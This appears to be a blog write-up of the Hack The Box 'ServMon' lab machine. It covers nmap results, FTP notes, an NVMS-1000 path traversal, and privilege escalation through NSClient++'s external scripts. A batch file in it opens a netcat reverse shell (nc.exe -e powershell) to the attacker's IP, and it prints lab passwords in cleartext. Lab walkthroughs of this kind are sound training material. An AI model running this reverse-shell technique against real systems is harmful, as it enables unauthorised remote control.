ServMon HTB Writeup

Hello,

This time I am writing the solution for the ServMon box. A easy windows box. Let’s dive into the solution.

🔥 nmap to get the open ports.

1
nmap -sC -sV -oA initial -Pn 10.10.10.184

The resutls…

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
21/tcp   open  ftp           Microsoft ftpd                                                                          
| ftp-anon: Anonymous FTP login allowed (FTP code 230)                                                               
|_01-18-20  12:05PM       <DIR>          Users                                                                       
| ftp-syst:                                                                                                          
|_  SYST: Windows_NT                                                                                                 
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)       
| ssh-hostkey:                                                                                                       
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)                                                       
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)                                                      
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)                                                    
80/tcp   open  http                                                                                                  
| fingerprint-strings:                                                                                               
|   GetRequest, HTTPOptions, RTSPRequest:                                                                            
|     HTTP/1.1 200 OK                                                                                                
|     Content-type: text/html                                                                                        
|     Content-Length: 340                                                                                                                                                                                                                  
|     Connection: close                                                                                              
|     AuthInfo:                                                                                                      
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">                                                                    
|     <head>                                                                                                         
|     <title></title>                                                                                                
|     <script type="text/javascript">                                                                                
|     window.location.href = "Pages/login.htm";                                                                      
|     </script>                                                                                                      
|     </head>                                                                                                        
|     <body>                                                                                                         
|     </body>                                                                                                        
|     </html>                                                                                                        
|   NULL:                                                                                                            
|     HTTP/1.1 408 Request Timeout                                                                                   
|     Content-type: text/html                                                                                        
|     Content-Length: 0                                                                                              
|     Connection: close                                                                                              
|_    AuthInfo:                                                                                                      
|_http-title: Site doesn't have a title (text/html).                                                                 
135/tcp  open  msrpc         Microsoft Windows RPC                                                                   
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn                                                           
445/tcp  open  microsoft-ds?                                                                                         
5666/tcp open  tcpwrapped                                                                                            
6699/tcp open  tcpwrapped                                                                                            
8443/tcp open  ssl/https-alt
| fingerprint-strings:                                  
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404  
|     Content-Length: 18
|     Document not found
|   GetRequest:            
|     HTTP/1.1 302                            
|     Content-Length: 0             
|_    Location: /index.html              
| http-title: NSClient++               
|_Requested resource was /index.html                      
| ssl-cert: Subject: commonName=

First of all the one port I will look is ftp because I have anonymous access allowed.
There is a directory named Users and inside that there are two directories Nadine and Nathan containing two files named Confidential.txt and Notes to do.txt respectively. It is a good thing at this time to keep notes about these two usernames.

The content of Confidential.txt:

1
2
3
4
5
6
7
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

I keep in back of my mind that there is file named Passwords.txt in Nathan Desktop folder.

And Notes to do.txt:

1
2
3
4
5
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

There are some incompleted todo’s such as remove public access to NVMS. Remember port 80? Let’s take a look into that.

port80vms

So this validates the 4th todo. I try to login by using admin as username and password but nothing. At this point because I don’t have a password, I try to search about vulnerabilites.

directory_traversalt_nvms1000

dir_traversal

I open burp, navigate to 10.10.10.184 intercept the request and then send it to repeater(ctrl+r).

verify_path_traversa

And indeed this works. Now If you remember from Confidential.txt there is a file with passwords. I get that file.

get_password_file

After trying each of this password with ssh password L1k3B1gBut7s@W0rk worked.

1
2
3
4
Microsoft Windows [Version 10.0.18363.752]          
(c) 2019 Microsoft Corporation. All rights reserved.
                                                    
nadine@SERVMON C:\Users\Nadine>

We can get user flag now.

After searching the box for hints about root, I find nothing. Going back to nmap we can see a port open 84433 wiht ssl cert. Visiting the site brings up a NSClient++.

Searching with searchsploit turns out there is a privilege escalation.

First we need to get the password of the client from file c:\program files\nsclient++\nsclient.ini

1
2
; Undocumented key                                        
password = ew2x6SsGTxjRwXOT

But the password does not work. Giving us a 403.

notallowed
Going back to the nsclient.ini file I see there is present a configuration which does not allow connections from 

1
2
3
4
5
6
7
; Undocumented key
allowed hosts = 127.0.0.1
````
Because I am using ssh I can create a local tunnel from my host to nsclient locally and then access it. By doing this I use a [trick](https://www.sans.org/blog/using-the-ssh-konami-code-ssh-control-sequences/) to access something like a hidden menu on ssh, and then execute
`-L 8443:127.0.0.1:8443`. And then go to my browser and access the website with `https://localhost:8443`

I now create a .bat script

@echo off
C:\Temp\nc.exe 10.10.14.52 9854 -e powershell

and upload it alongside nc.exe inside `C:\Temp\` and setup listener on our local box

Next step is to enable two modules:
 - CheckExternalScripts
 - Scheduler

After I create a externalscript, with these key and value.(replace fuxsocy.bat with your .bat filename)

![extscript](https://user-images.githubusercontent.com/16364370/79078083-ed55fa80-7cd3-11ea-9ba3-7a07fd66b31d.png)

Next I setup to run it every minute.

![timer](https://user-images.githubusercontent.com/16364370/79078482-af0e0a80-7cd6-11ea-8c8c-878907d3f63f.png)

and specify the command, which in our case is rce, which is the name of the external script which will execute the command.

![rce](https://user-images.githubusercontent.com/16364370/79078149-5473af00-7cd4-11ea-8c9a-7633d5dd813c.png)

Then I save the Changes under the `Changes` button and Under `Control` button I reset the service. I wait for 1-2 minutes and get a shell as administrator.

![shell_as_admistrator](https://user-images.githubusercontent.com/16364370/79078514-e1b80300-7cd6-11ea-901b-ad1dfffc54c7.png)
htb
ServMon HTB Writeup
http://3rg1s.com/2020/06/20/2020-06-20-ServMon/
Author
fuxsocy
Posted on
June 20, 2020
Licensed under